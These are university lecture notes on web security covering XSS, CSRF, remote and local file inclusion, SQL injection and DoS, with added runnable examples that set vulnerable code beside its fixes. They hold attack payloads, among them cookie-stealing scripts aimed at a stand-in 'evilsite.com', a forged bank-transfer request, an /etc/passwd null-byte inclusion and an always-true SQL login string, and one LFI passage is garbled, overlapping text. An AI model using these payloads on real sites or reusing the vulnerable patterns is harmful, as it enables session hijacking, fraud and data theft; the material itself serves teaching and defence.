
CSE 477: Introduction to Computer Security
Lecture 20: Web Security - 2

Course Teacher: Dr. Md Sadek Ferdous


Assistant Professor, CSE, SUST
E-mail: ripul.bd@gmail.com
Outline
• Attacks on Web Protocol
• Mitigations Techniques
malicious actions that might be attempted by the media content players and
interactive tools that should otherwise be providing a safe and enjoyable
user experience.

Sandboxing
The Sandbox
Before continuing the discussion of such attacks on clients, it is helpful to introduce the idea of the sandbox. A sandbox refers to the restricted privileges of an application or script that is running inside another application. For example, a sandbox may allow access only to certain files and devices. These limitations are collectively known as a sandbox. (See Figure 15.)

• A sandbox refers to the restricted privileges of an application or script that is running inside another application
• For example, a sandbox may allow access only to certain files and devices

Figure 15: Actions restricted to a sandbox. The figure contrasts The Main Application, whose allowed actions are read, write and execute on all user files and display of any content, with The Sandbox, whose allowed actions are read-only access to public user files and display of embedded content only.

Javascript has a carefully delineated set of elements that it is allowed to access when run inside a web browser, including the DOM hierarchy of a web site. Javascript has no ability to execute code on a user’s machine outside of the browser, however, or to affect web sites open in other browser windows.
Sandboxing
• Developers are often striving to create new ways of isolating code
execution to reduce the impact of malicious behaviour
• For example, Google’s Chrome browser runs each new tab as a new
process, effectively sandboxing each tab at the operating system level
• This tactic mitigates the risk of vulnerabilities allowing browser tabs to
access the contents of other tabs by creating a sandbox beneath the
application layer
Adobe Flash
• Online media content can be another vector for attack
• Increasingly, audio and video are embedded into web sites
• If an embedded media player used by a web browser to play this content has
application-level flaws, malicious media files may be created to escape the sandbox
of the victim’s browser and execute code on the victim’s machine
• This has been a recurring problem for streaming media technologies
• One particularly popular media format is Adobe Flash (formerly known as Macromedia Flash,
then Shockwave Flash)
• This technology is nearly ubiquitous, and is frequently used to create advertisements
or other interactive web content
• Like all media content requiring a separate player, however, Flash presents potential security vulnerabilities through the exploitation of application flaws in the Flash media player
• Thus, one should always be using the latest version of this player, which will include
patches to previously discovered vulnerabilities
Mobile code
• What is mobile code?
• Executable program
• Sent via a computer network
• Executed at the destination
• Examples
• JavaScript
• ActiveX
• Java Plugins
• Integrated Java Virtual Machines
ActiveX vs Java
ActiveX:
• Windows-only technology runs in Internet Explorer
• Binary code executed on behalf of browser
• Can access user files outside the sandbox
• Support for signed code
• IE configuration options – Allow, deny, prompt – Administrator approval
Java:
• Via Java Applet
• Platform-independent via browser plugin
• Java code running within browser
• Sandboxed execution
• Support for signed code
• Applet runs only on site where it is embedded
• Applets deemed trusted by user can escape sandbox
ActiveX
• This signed ActiveX control asks the user for permission to run
• If approved, the control will run
with the same privileges as the
user
• The “Always trust content from
…” checkbox automatically
accepts controls by the same
publisher
• Probably a bad idea
ActiveX
• Trusted publishers
• List stored in the Windows registry
• Malicious ActiveX controls can modify the registry table to make their publisher
trusted
• All future controls by that publisher run without prompting user
• Unsigned controls
• The prompt states that the control is unsigned and gives an accept/reject option
• Even if you reject the control, it has already been downloaded to a temporary
folder where it remains
• It is not executed if rejected, but not removed either
Cross-Site Scripting (XSS) attack
• One of the most common web security vulnerabilities today is from cross-site scripting (XSS) attacks
• These are attacks where improper input validation on a web site allows malicious users to inject code into the web site
• which later is executed in a visitor’s browser

Figure 16: In an XSS attack, the attacker uses the web site as a vector to execute malicious code in a victim’s browser. The figure shows the Attacker sending Malicious Script Code to the XSS Vulnerable Website, which delivers it to the Victim.

Persistent XSS
• In a persistent XSS attack, the code that the attacker injects into the web site remains on the site for a period of time and is visible to other users
• A classic example of persistent XSS is exploiting a web site’s guestbook or message board
• Consider a web site, such as a news web site or social networking site, that incorporates a guestbook allowing visitors to enter comments and post them for other visitors to see
• If the user input to be stored in the guestbook is not properly sanitised to strip certain characters, it may be possible for an attacker to inject malicious code that is executed when other users visit the site

First, the user might be presented with the form from Code Fragment 6.

<html>
<title>Sign My Guestbook!</title>
<body>
Sign my guestbook! Your comments are greatly appreciated!<br />
<form action="sign.php" method="POST">
<input type="text" name="name">
<input type="text" name="message" size="40">
<input type="submit" value="Submit">
</form>
</body>
</html>

Code Fragment 6: A page that allows users to post comments to a guestbook.

On entering a comment, this page will submit the user’s input as POST variables to sign.php. This page presumably uses server-side code (which will be discussed later in this chapter) to insert the user’s input into the guestbook page, which might look something like that shown in Code Fragment 7.

<html>
<title>My Guestbook</title>
<body>
Your comments are greatly appreciated!<br />
Here is what everyone said:<br />
Joe: Hi! <br />
John: Hello, how are you? <br />
Jane: How does the guestbook work? <br />
</body>
</html>

Code Fragment 7: The guestbook page incorporating comments from visitors.

Take, for instance, the snippet of Javascript code in Code Fragment 8.

<script>
alert("XSS injection!");
</script>

Code Fragment 8: Javascript code that might be used to test XSS injection.

This Javascript code simply creates a pop-up message box with the text XSS injection! when the code is executed. If the sign.php script on the server simply copies whatever the user types in the POST form into the contents of the guestbook, the result would be the code shown in Code Fragment 9. If anyone visited the page containing the attacker’s comment, this excerpt would be executed as code and the user would get a pop-up message box.

<html>
<title>My Guestbook</title>
<body>
Your comments are greatly appreciated!<br />
Here is what everyone said:<br />
Evilguy: <script>alert("XSS Injection!");</script> <br />
Joe: Hi! <br />
John: Hello, how are you? <br />
Jane: How does the guestbook work? <br />
</body>
</html>

Code Fragment 9: The resulting guestbook page, with the Javascript above injected via XSS.

In this case, the guestbook is known as an attack vector: it’s the means by which a malicious user can inject code. The specifics of that injected code are known as the payload. In this case, the payload was a relatively harmless (if annoying) pop-up box, but it is possible to construct much more dangerous payloads. (See Figure 16.)

Javascript has the ability to redirect visitors to arbitrary pages, so this is one possible avenue for attack. Malicious users could simply inject a short script that redirects all viewers to a new page that attempts to download viruses or other malware to their systems. Combined with Javascript’s ability to access and manipulate cookies, this attack can become even more dangerous. For example, an attacker could inject the script of Code Fragment 10 into a guestbook.

<script>
document.location = "http://www.evilsite.com/steal.php?cookie=" + document.cookie;
</script>

Code Fragment 10: A Javascript function that could be used to steal a user’s cookie.

This code uses Javascript’s ability to access the DOM to redirect a visitor to the attacker’s site, www.evilsite.com, and concatenates the user’s cookies (accessed by the DOM object document.cookie) to the URL as a GET parameter for the steal.php page, which presumably records the cookies. The attacker could then use the cookies to impersonate the victim in a session hijacking attack. Nevertheless, this technique is a bit crude, because a user would most likely notice if their browser was redirected to an unexpected page. There are, however, several techniques an attacker could use to hide the execution of this code. Two of the most popular are embedding an image request to the malicious URL and using an invisible iframe, an HTML element which makes it possible to embed a web page inside another. Code Fragment 11 shows a use of Javascript to create an image, then sets the source of that image to the attacker’s site, again passing the cookie variables to steal.php. When the page is rendered, the victim’s browser makes a request to this URL for the image, passing the cookie to the server, without displaying any results (since no image is returned).

<script>
img = new Image();
img.src = "http://www.evilsite.com/steal.php?cookie=" + document.cookie;
</script>

Code Fragment 11: Using an image for XSS.
…and displayed in a web page at a later time, at which point the script … execute in the user’s browser.

Non-persistent XSS
• In contrast to the previous example of a guestbook, where the injected Javascript remains on the page for viewers to see, most real-life examples of cross-site scripting do not allow the injected code to persist past the attacker’s session
• There are many examples of how these non-persistent XSS vulnerabilities can be exploited
• A classic example of non-persistent XSS is a search page that echoes the search query
• For example, on typing “security book” into a search box on a web site, the results page might begin with a line reading
Search results for security book.

Non-persistent XSS
• If the user’s input is not sanitised for certain characters, injecting segments of code into the search box could result in the search-results page including that code as content on the page, where it would then be executed as code in the client’s browser
• At first glance, this vulnerability may not seem all that significant; after all, an attacker seems to only have the ability to inject code to a page that is only viewable by the attacker
• Nevertheless, consider a search page where the search query is passed as a GET parameter to a search script, as represented by the following URL:
http://victimsite.com/search.php?query=searchstring
• An attacker could construct a malicious URL that includes their chosen Javascript payload, knowing that whenever someone navigated to the URL, their payload would be executed in the victim’s browser
• For example, the following URL might be used to accomplish the same cookie-stealing attack as the previous persistent example:
http://victimsite.com/search.php?query=<script>document.location='http://evilsite.com/steal.php?cookie='+document.cookie</script>
XSS defences
• Proxy-based:
• Analyse HTTP traffic between browser and web server
• Look for special HTML characters
• Encode them before executing the page on the user’s web browser (e.g. NoScript, a Firefox plugin)
• Application-level firewall:
• Analyse HTML pages for hyperlinks that might lead to leakage of sensitive
information
• Stop bad requests using a set of connection rules
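The defence bullets above describe proxies and application firewalls that encode special HTML characters before a page reaches the browser. The same encoding belongs inside the application, at the exact point where user input is written into HTML. The following Node.js code is an added example and is not code from the lecture or the textbook: it re-creates the guestbook of Code Fragments 7 and 9 and the echoing search page of the non-persistent example, and compares the naive rendering with one that encodes the input. The comments, the search string and the `containsScriptTag` check are constructed for this example.

```javascript
// Added example (not the lecture's or textbook's code): HTML output encoding as
// the application-level defence against both persistent and reflected XSS.
// Runs under Node.js; all inputs below are constructed sample data.

// The five characters that carry meaning in HTML text and attribute values.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode a value so the browser renders it as text rather than as markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Constructed guestbook entries: the first three mirror Code Fragment 7, the
// last is the test payload of Code Fragment 8 submitted as a comment.
const SAMPLE_COMMENTS = [
  { name: "Joe", message: "Hi!" },
  { name: "John", message: "Hello, how are you?" },
  { name: "Jane", message: "How does the guestbook work?" },
  { name: "Evilguy", message: '<script>alert("XSS injection!");</script>' },
];

// Shared page skeleton; `entries` is the already-rendered comment list.
function guestbookPage(entries) {
  return [
    "<html>",
    "<title>My Guestbook</title>",
    "<body>",
    "Your comments are greatly appreciated!<br />",
    "Here is what everyone said:<br />",
    ...entries,
    "</body>",
    "</html>",
  ].join("\n");
}

// What a naive sign.php does: copy the POST fields straight into the page.
// This reproduces the vulnerable behaviour that yields Code Fragment 9.
function renderGuestbookUnsafe(comments) {
  return guestbookPage(comments.map((c) => `${c.name}: ${c.message} <br />`));
}

// The fix: encode every user-supplied value where it is written into HTML.
function renderGuestbookSafe(comments) {
  return guestbookPage(
    comments.map((c) => `${escapeHtml(c.name)}: ${escapeHtml(c.message)} <br />`)
  );
}

// The reflected case: search.php echoing its GET parameter back to the user.
function renderSearchResults(query, { encode = true } = {}) {
  const shown = encode ? escapeHtml(query) : query;
  return `<p>Search results for ${shown}.</p>`;
}

// A coarse check a proxy or test harness can run on a generated page: does the
// response body still contain an unencoded script element?
function containsScriptTag(html) {
  return /<\s*script\b/i.test(html);
}

// The payload from the lecture's reflected-XSS URL, as the server sees it
// after URL decoding.
const REFLECTED_PAYLOAD =
  "<script>document.location='http://evilsite.com/steal.php?cookie='+document.cookie</script>";

console.log("unsafe guestbook contains <script>:",
  containsScriptTag(renderGuestbookUnsafe(SAMPLE_COMMENTS))); // true
console.log("encoded guestbook contains <script>:",
  containsScriptTag(renderGuestbookSafe(SAMPLE_COMMENTS))); // false
console.log(renderSearchResults(REFLECTED_PAYLOAD));
```

Encoding at output time is what makes the guestbook safe regardless of what was stored: the payload from Code Fragment 8 is still in the data, but the browser receives `&lt;script&gt;` and shows it as text. The same function neutralises the reflected search payload, which is why the two cases share one defence.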
Cross-site Request Forgery (CSRF)
• Another common type of web site vulnerability is known as Cross-Site Request Forgery (CSRF)
• CSRF is essentially the opposite of cross-site scripting
• While XSS exploits a user’s trust of a specific web site, CSRF exploits a web site’s trust of a specific user
• In a CSRF attack, a malicious web site causes a user to unknowingly execute commands on a third-party site that trusts that user, as depicted in Figure 17

Figure 17: In a CSRF attack, a malicious web site executes a request to a vulnerable site on behalf of a trusted user of that site. The figure shows the Victim, a Legitimate Request to the Evil Website, and the resulting Malicious Request to the CSRF Vulnerable Website.

CSRF
• Suppose an innocent user handles his banking online at www.naivebank.com
• This user may stumble upon a site, www.evilsite.com, that contains the lines of malicious JavaScript code in Code Fragment 14

<script>
document.location="http://www.naivebank.com/transferFunds.php?amount=10000&fromID=1234&toID=5678";
</script>

Code Fragment 14: Code that exploits CSRF.

• If the user is already authenticated, on reaching this line of code the victim’s browser would redirect to the victim’s bank
• specifically, to a page that attempts to transfer $10,000 from the victim’s account (#1234) to the attacker’s account (#5678)
CSRF
• More recently, a new type of CSRF attack has emerged, commonly known as a
login attack
• In this variant, a malicious web site issues cross-site requests on behalf of the
user, but instead of authenticating to the victim site as the user, the requests
authenticate the user as the attacker
• For example, consider the case of a malicious merchant who allows customers
to purchase using PayPal
• After a visitor logs into their PayPal account to complete a payment, the
merchant could silently issue a forged cross-site request that reauthenticates
the user by logging them in as the attacker
• Finally, the user, unaware that they are logged in as the attacker, might input
credit card information that the attacker could later access by checking his
account
CSRF defences
• Very difficult to prevent, because to the web site the forged request looks legitimate
• Without a persistent cookie, use a session token and pass it with every
request
• The attacker needs to get hold of this session token to launch the attack
• However, different session tokens must be used for every session
• Also, don’t forget to log out after every session!
Client side attack defences
• Mitigation of these attacks by the user can be facilitated with two
primary methods:
• Safe-browsing practices
• Built-in browser security measures
Safe-browsing practices
• Links to unknown sites, either contained in email or in the body of an
untrusted web site, should not be clicked on
• In addition, whenever entering personal information to a web site, a user
should always confirm that HTTPS is being used by looking for an indication in
the browser, such as a padlock in the status bar or colour coding in the
address bar
• Most financial sites will use HTTPS for login pages, but if not, the user should
manually add the “s” or find a version of the login page that does use HTTPS
• In addition, the legitimacy of the site should be confirmed by examining the
URL and ensuring that there are no certificate errors
• And, of course, users should never provide sensitive information to an
unknown or untrusted web site
Built-in browser security measures
• Users should also be aware of a number of browser features that are designed
to prevent certain types of attacks
• Most importantly, each browser allows the customisation of settings that
allow fine-grained control over how different features are allowed to run
• Internet Explorer introduces the notion of zones
• By default, web sites are placed in the Internet Zone
• Users can then delegate sites to Trusted and Restricted zones
• Each zone has its own set of security policies, allowing the user to have fine-grained
control depending on whether or not they trust a particular web site
• In contrast, Firefox does not utilise security zones, but applies its rules to all visited sites
• Many plugins allow further division of security policies into trusted and untrusted zones, however
• Opera takes the approach of defaulting to global security settings, but allowing the user to apply specific policies to individual sites
Built-in browser security measures
• Most browsers also feature automatic notifications if a user visits a web
site that is on a public blacklist of known phishing or malware-
distributing sites
• Browser plugins, such as NoScript, use similar white list and blacklist
mechanisms, and can attempt to detect XSS attacks and prevent cookie
theft by sanitising HTTP requests and scanning the source code of a web
site before execution
• Thus, users should take advantage of the built-in browser security
measures and make sure they are running the most up-to-date version
of their browser, so that it has all the latest security updates
Server-side attacks
…server-side scripting languages allow servers to perform actions such as accessing databases and modifying the content of a site based on user input or personal browser settings. They can also provide a common look and feel to a web site by using scripts that generate a common banner and toolbar on all the pages of a web site. (See Figure 19.)

Figure 19: Actions performed by a web server to produce dynamic content. The figure shows the Client, the Web Server and its Scripting Module, with the following steps:
1. Client requests a dynamic page, possibly providing user-specific inputs
2. Server passes user input and scripted HTML to Scripting Module
3. Scripting Module performs script, possibly accessing other servers and/or databases, and returns HTML
4. Server returns to user dynamic content in a customized HTML file

Server-side scripting
…it through a PHP processing module in the web server software to create an output HTML file that is sent to a user. The code sample shown in Code Fragment 15 is an example of a PHP script that dynamically generates a page based on a GET variable called “number.”

<html>
<body>
<p>Your number was <?php echo $x=$_GET['number']; ?>.</p>
<p>The square of your number is <?php $y = $x * $x; echo $y; ?>.</p>
</body>
</html>

Code Fragment 15: A simple PHP page.

This variable, number, would most likely be provided through a standard HTML form (submit via HTML form), as in our previous example. The “<?php” and “?>” tags denote the start and end of the script. The echo command outputs results to the screen. The array that stores all of the provided GET variables is referred to as “$_GET”; in this case, we are accessing the one named number. Finally, note that variables $x and $y are used without a previous type declaration. Their type (integer) is decided by the PHP processor at runtime, when the script is executed. The execution of this code is completely invisible to the user, who only receives its output. If the user had previously entered “5” as input to the GET variable, number, the response would be as shown in Code Fragment 16.

<html>
<body>
<p>Your number was 5.</p>
<p>The square of your number is 25.</p>
</body>
</html>

Code Fragment 16: The output of Code Fragment 15 when the GET variable number is 5.
Server-side scripting inclusion attack
• In a server-side script inclusion attack, a web security vulnerability at a
web server is exploited to allow an attacker to inject arbitrary scripting
code into the server
• which then executes this code to perform an action desired by the attacker
• Two types:
• RFI (Remote-File Inclusion):
• Enables an attacker to execute a remote script hosted on another server
• LFI (Local-File Inclusion):
• Enables an attacker to execute a local malicious script on the same server
…files other than the one that is currently being run. For example, one may want to include a common header and footer to all pages of a website. In addition, it may be useful to load different files based on user input. PHP provides the include function, which incorporates the file specified by the argument into the current PHP page, executing any PHP script contained in it. Consider the index.php page shown in Code Fragment 17, where “.” denotes concatenation of two strings.

RFI

<?php
include("header.html");
include($_GET['page'].".php");
include("footer.html");
?>

Code Fragment 17: A PHP page that uses file inclusion to incorporate an HTML header, an HTML footer, and a user-specified page.

• User submits: victim.com/index.php?page=news
• Server executes: victim.com/index.php?page=news.php

Navigating to victim.com/index.php?page=news in this case would result in the web server loading and executing page news.php using the PHP processor, which presumably generates the news page and displays it for the user. However, an attacker might navigate to a page specified by the following URL:

http://victim.com/index.php?page=http://evilsite.com/evilcode

• Attacker submits: http://victim.com/index.php?page=http://evilsite.com/evilcode
• Server executes: http://evilsite.com/evilcode.php

This would result in the web server at victim.com executing the code at evilsite.com/evilcode.php locally. Such an attack is known as a remote-file inclusion (RFI) attack.
• An example of code an attacker might execute in such an attack is a web shell, which is a remote command station that allows an attacker to navigate to the web server and possibly view, edit, upload, or delete files on web sites that this web server is hosting
• Fortunately, remote-file inclusion attacks are becoming less common
• because most PHP installations now default to disallowing the server to execute code hosted on a separate server
Nevertheless, this does not pre…
a malicious purpose). The difference in an LFI attack, however, is that the
As in ancode
executed RFIisattack, a local-file
not contained server, (LFI)
inclusion
on a remote but on attack
the victimcauses
servera server to
http://victim.com/index.php?page=admin/secretpage
execute
itself. Thisinjected
locality code it would
may allow not have
an attacker accessotherwise performedby
to private information (usually for
ameans
malicious purpose).
of bypassing The difference
authentication in an For
mechanisms. LFIexample,
The URL above might cause the index page to execute the previously
attack, an however,
attacker is that the
executed
itself. LFI
might navigate to
protected code
This
isthe
locality
notfollowing
secretpage.php. contained
may
URL:on a LFI
Sometimes,
allowsystem,
remote
an attacker
accesshttp://victim.com/index.php?page=admin/secretpage
files on the web server’s outside
server,
attacks
access
but on
can allow
of thetoroot
anthe
private
victim
attacker
web information
to server
directory. by
means of bypassing
For example, many Linux authentication
systems keepmechanisms. For example,
a file at /etc/passwd that stores an attacker
local
mightThenavigate
authentication
URL above to might
the following
information. cause the URL:
In the example
index page above, note that
to execute attempting to
the previously
access
protectedthissecretpage.php. Attacker
file by navigating tosubmits
the following
Sometimes, LFI attacksURLcanwill
allownotanwork:
attacker to Server executes:
accesshttp://victim.com/index.php?page=admin/secretpage
Sometimes, LFI attacks can allow an attacker to access files on the web server’s system, outside of the root web directory.

Attacker submits the following URL:
  http://victim.com/index.php?page=admin/secretpage
The URL above might cause the index page to execute the previously protected secretpage.php. Authentication bypassed.

For example, many Linux systems keep a file at /etc/passwd that stores local authentication information. In the example above, note that attempting to access this file by navigating to the following URL will not work:
  http://victim.com/index.php?page=/etc/passwd
Because the code concatenates .php to any input before trying to include the code, the web server will try to execute /etc/passwd.php, which does not exist.
  Attacker submits: http://victim.com/index.php?page=/etc/passwd
  Server executes:  http://victim.com/index.php?page=/etc/passwd.php -> Not found!

To bypass this, an attacker could include what is known as a null byte, which can be encoded as %00 in a URL. The null byte denotes the end of the string, allowing the attacker to effectively remove the .php concatenation. In this case, the following URL could be accessed:
  Attacker submits: http://victim.com/index.php?page=/etc/passwd%00
  Server executes:  http://victim.com/index.php?page=/etc/passwd -> Bingo!!
%00 -> the null byte -> end of string; anything after it is ignored!

Caveat: the truncation only works when the path is handled as a NUL-terminated C string. PHP has rejected paths containing a null byte since version 5.3.4, so on current PHP the %00 trick fails; the underlying inclusion flaw remains, however, and traversal to any file that really does end in .php still works.

This form of attack may seem relatively benign when limited to information disclosure, but the advent of user-provided content suggests another method of attack using this technique. For example, a web site that is vulnerable to local-file inclusion might also have a means for users to upload images. If the image uploading form does not carefully check what is being uploaded, this may provide an attacker an avenue to upload malicious code to the server (that would not ordinarily be executed), and
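The inclusion flaw and the null-byte bypass described above, re-created as an added Python example. This is not code from the lecture or from the textbook it draws on: the lecture describes PHP code that appends .php to the page parameter and includes the result, and this block mirrors that logic in Python so that it can be run offline. The web root, its two page files and the sensitive file one level above it are constructed in a temporary directory; legacy_c_string models how a NUL-terminated C path behaved in PHP before 5.3.4; the allow-list hardening in include_page_safe is the editor's suggested fix, not the lecture's.

```python
import os
import tempfile

# Constructed fixture (not from the lecture): a fake web root containing a
# public page and a "protected" admin page, plus a sensitive file one level
# above the root standing in for /etc/passwd.
def build_fixture():
    base = tempfile.mkdtemp()
    root = os.path.join(base, "www")
    os.makedirs(os.path.join(root, "admin"))
    contents = {
        os.path.join(root, "home.php"): "<h1>Welcome</h1>",
        os.path.join(root, "admin", "secretpage.php"): "<h1>Admin only</h1>",
        os.path.join(base, "passwd"): "root:x:0:0:root:/root:/bin/bash\n",
    }
    for path, body in contents.items():
        with open(path, "w") as fh:
            fh.write(body)
    return root


def legacy_c_string(path):
    """How a NUL-terminated C string sees the path: everything after the
    first \\x00 is ignored. PHP before 5.3.4 handed include paths to the
    filesystem this way, which is what made the %00 trick work."""
    return path.split("\x00", 1)[0]


def include_page_vulnerable(root, page, null_byte_truncation=False):
    """Mirrors include($_GET['page'] . '.php') with no validation at all.
    With null_byte_truncation=False the path reaches open() intact and,
    like current PHP, Python refuses a path that contains a NUL byte."""
    path = os.path.join(root, page + ".php")
    if null_byte_truncation:
        path = legacy_c_string(path)
    with open(path) as fh:
        return fh.read()


# Hardened version (editor's suggestion): the request names a key in an
# allow-list, never a path, and the resolved file must stay inside root.
ALLOWED_PAGES = {"home": "home.php"}


def include_page_safe(root, page):
    if "\x00" in page:
        raise ValueError("NUL byte in page parameter")
    filename = ALLOWED_PAGES.get(page)
    if filename is None:
        raise PermissionError(f"page {page!r} is not in the allow-list")
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(os.path.join(real_root, filename))
    # Belt and braces: even an allow-listed entry must resolve inside root.
    if os.path.commonpath([real_root, real_path]) != real_root:
        raise PermissionError("resolved path escapes the web root")
    with open(real_path) as fh:
        return fh.read()


if __name__ == "__main__":
    root = build_fixture()
    print(include_page_vulnerable(root, "admin/secretpage"))  # authentication bypassed
    try:
        include_page_vulnerable(root, "../passwd")  # ../passwd.php does not exist
    except FileNotFoundError as exc:
        print("not found:", exc.filename)
    # Bingo on pre-5.3.4 PHP: the NUL cuts off the appended .php
    print(include_page_vulnerable(root, "../passwd\x00", null_byte_truncation=True))
    try:
        include_page_vulnerable(root, "../passwd\x00")  # what current PHP and Python do
    except ValueError as exc:
        print("rejected:", exc)
    print(include_page_safe(root, "home"))
```

Run it directly to see the four outcomes from the slides in order: the protected admin page served without authentication, the "Not found!" for /etc/passwd.php, the "Bingo!!" read of the sensitive file once the null byte truncates the path, and the rejection a current runtime gives the same request. The safe variant never touches the filesystem with attacker-controlled text, which is why the NUL check there is only defence in depth.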
Database and SQL injection attack

Since databases often contain confidential information, they are frequently the target of attacks. Attackers could, for example, be interested in accessing private information or modifying information in a database for financial gain. Because of the sensitivity of information stored in a database, it is generally unwise to allow unknown users to interact directly with a database. Thus, most web-based database interaction is carried out on the server side, invisible to the user, so that the interactions between users and the database can be carefully controlled, as depicted in Figure 20. The goal of an attacker, of course, is to breach this controlled database interaction to get direct access to a database.

[Figure 20: Legitimate Client -> Web Server -> (protected, controlled access) -> Database. Attacker: desires direct, unprotected access to the database.]
Figure 20: A model for user interactions with a web server that uses a database. All database queries are performed via the web server, and direct access to the database by the user is prohibited. The attacker wants to break through these protections to use the web server to gain direct access to the database.

• Many web applications take user input from a form
• Often this user input is used literally in the construction of a SQL query submitted to a database
• For example: SELECT user FROM table WHERE name = ‘user_input’;
• An SQL injection attack involves placing SQL statements in the user input
SQL injection attack
• SQL lets you access and manage (query) databases
• A database is a large collection of data organised in tables for rapid search and retrieval; each table consists of rows (records) and columns (fields)
• The SELECT statement is used to select data FROM one or more tables in a database
• The result-set is stored in a result table
• The WHERE clause is used to filter records
SQL injection attack
• Standard query to authenticate users:
  • select * from users where user='$username' AND pwd='$passwd'
• Classic SQL injection attack
  • Server-side code sets the variables $username and $passwd from the user input to a web form
  • The variables are interpolated directly into the SQL query string:
    • select * from users where user='$username' AND pwd='$passwd'
  • Special strings can be entered by the attacker, e.g. M' OR '1=1 in both fields, giving:
    • select * from users where user='M' OR '1=1' AND pwd='M' OR '1=1'
  • Because AND binds tighter than OR, the WHERE clause is read as (user='M') OR ('1=1' AND pwd='M') OR ('1=1'); MySQL treats the non-empty string literal '1=1' as true, so every row matches (the same effect is more commonly written as ' OR '1'='1)
• Result: access obtained without the password!
SQL injection attack solution
• SQL injection vulnerabilities are the result of programmers failing to sanitise user input before using that input to construct database queries
• Prevention of this problem is relatively straightforward
• Most languages have built-in functions that escape the dangerous characters in input before it is placed in a query
• For example, PHP provides the function mysql_real_escape_string to escape special characters (including single and double quotes) so that the resulting string is safe to be used in a MySQL query
  • Caveat: the mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7.0; the current recommendation is to keep data out of the query text entirely by using prepared statements with bound parameters (mysqli or PDO), which also removes the risk of forgetting to escape a single value
• Techniques have also been developed for the automatic detection of SQL injection vulnerabilities in legacy code
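The classic authentication bypass from the previous slide and the two fixes discussed on this one (escaping the input, and the prepared-statement alternative), side by side as an added Python example. It is not code from the lecture: the lecture's server-side code is PHP against MySQL, while this block uses Python's sqlite3 module with an in-memory database so that it runs offline. The users table and its two rows are constructed here; sql_escape is a minimal stand-in for mysql_real_escape_string that only doubles single quotes, which is sufficient for SQLite string literals but not a general replacement for the real function.

```python
import sqlite3

# Constructed sample data (not from the lecture); sqlite3 stands in for MySQL.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]

PAYLOAD = "' OR '1'='1"  # the classic always-true injection string


def make_db():
    """In-memory database with a users(user, pwd) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT NOT NULL, pwd TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, passwd):
    """Mirrors the slide: form values are interpolated straight into the
    query text, so a quote in the input ends the string literal and the
    rest of the input is parsed as SQL."""
    query = f"select * from users where user='{username}' AND pwd='{passwd}'"
    rows = conn.execute(query).fetchall()
    return len(rows) > 0


def sql_escape(value):
    """Escaping in the spirit of mysql_real_escape_string, reduced to the
    one rule SQLite needs: a literal single quote becomes two single
    quotes, so it can no longer terminate the string literal."""
    return value.replace("'", "''")


def login_escaped(conn, username, passwd):
    """Same string concatenation as login_vulnerable, but each value is
    escaped first (the slide's suggested fix)."""
    query = (
        f"select * from users where user='{sql_escape(username)}' "
        f"AND pwd='{sql_escape(passwd)}'"
    )
    return len(conn.execute(query).fetchall()) > 0


def login_parameterized(conn, username, passwd):
    """Preferred fix: a prepared statement with bound parameters. The query
    text is fixed at development time and the driver hands the values to
    the engine separately, so they can never be parsed as SQL."""
    query = "select * from users where user=? AND pwd=?"
    return len(conn.execute(query, (username, passwd)).fetchall()) > 0


if __name__ == "__main__":
    conn = make_db()
    for name, login in [("vulnerable", login_vulnerable),
                        ("escaped", login_escaped),
                        ("parameterized", login_parameterized)]:
        print(f"{name:13s} valid creds: {login(conn, 'alice', 's3cret')!s:5s} "
              f"injected: {login(conn, PAYLOAD, PAYLOAD)}")
```

With PAYLOAD in both fields the vulnerable query becomes `select * from users where user='' OR '1'='1' AND pwd='' OR '1'='1'`, which matches every row, so the login succeeds without a password; the escaped and parameterized versions see the same input as two literal strings and reject it while still accepting alice's real credentials.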
DoS’ing web servers

important web site can also serve as protection. DNS supports the ability to have multiple IP addresses for the same domain name, so this replication of web servers can be transparent to users. In this case, redundancy can make a web site more resilient against DDoS attacks by making it more difficult for an attack to disable all the different web servers that are hosting that web site. (See Figure 21.)
[Figure 21: (a) Single Web Server for example.com; (b) Multiple Servers for example.com]

Figure 21: How replication helps against DDoS web attacks: (a) A single web server for a web site, which is quite vulnerable to DDoS web attacks. (b) Multiple web servers for the same web site, which are more resilient.